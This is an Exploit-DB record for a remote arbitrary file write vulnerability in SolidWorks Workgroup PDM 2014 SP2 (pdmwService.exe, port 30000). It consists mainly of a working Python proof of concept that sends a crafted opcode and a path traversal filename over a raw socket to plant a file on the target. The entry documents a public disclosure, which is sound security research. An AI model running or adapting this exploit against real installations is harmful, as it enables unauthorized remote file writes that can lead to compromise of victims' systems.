SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability

2014-02-22T00:00:00
ID EDB-ID:31831
Type exploitdb
Reporter Mohamed Shetta
Modified 2014-02-22T00:00:00

Description

SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability. CVE-2014-100015. Remote exploit for windows platform

                                        
                                            '''
# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability
# Date: 2-21-2014
# Author: Mohamed Shetta
Email: mshetta |at| live |dot| com
# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
# Tested on: Windows 7
#Vulnerability type: Arbitrary File Write
#Vulnerable file: pdmwService.exe
#PORT: 30000


---------------------------------------------------------------------------------------------------------
Software Description:

SolidWorks
Workgroup PDM is a PDM tool that allows SolidWorks users operating in 
teams of 10 members or less to work on designs concurrently. With 
SolidWorks PDM Workgroup, designers can search, revise, and vault CAD 
data while maintaining an accurate design history.


---------------------------------------------------------------------------------------------------------
Vulnerability Details:

This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of SolidWorks Workgroup PDM.

------------------------------------------------------------------------------------------------------------
Disclosure timeline:

12/15/2013 - Vendor notified and no response.
2/21/2014 - Public disclosure
'''

#!/usr/bin/env python
  
import socket
import struct
import ctypes

FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test
Data="A"*1028
FileSize=len(Data)
FNsz=len(FileName)
OpCode="\xD0\x07\x00\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 30000))
s.send(OpCode)
s.send(struct.pack("I", FNsz))
s.send(FileName)
s.send(struct.pack('<Q', FileSize))
s.send(Data)